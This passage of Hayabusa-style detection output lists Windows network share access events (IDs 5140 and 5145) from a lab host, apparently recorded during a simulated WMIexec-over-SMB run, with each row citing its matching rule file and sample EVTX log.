Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\DesktopTileResources\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Downloaded Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ImmersiveControlPanel\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\media\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Offline Web Pages\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ToastData\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ar | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\bg | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\cs | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\da | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\de | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\el | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\en | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\es | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\et | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fi | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\he | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hu | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\it | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ja | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ko | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lt | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lv | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\nl | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\no | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pl | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt-BR | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ro | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ru | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sk | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sl | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sr-Latn-RS | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.447 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sv | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\th | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\tr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\uk | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANS | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANT | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HK | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\DevInvCache | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\apppatch64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom\Custom64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\en-US | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppReadiness | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 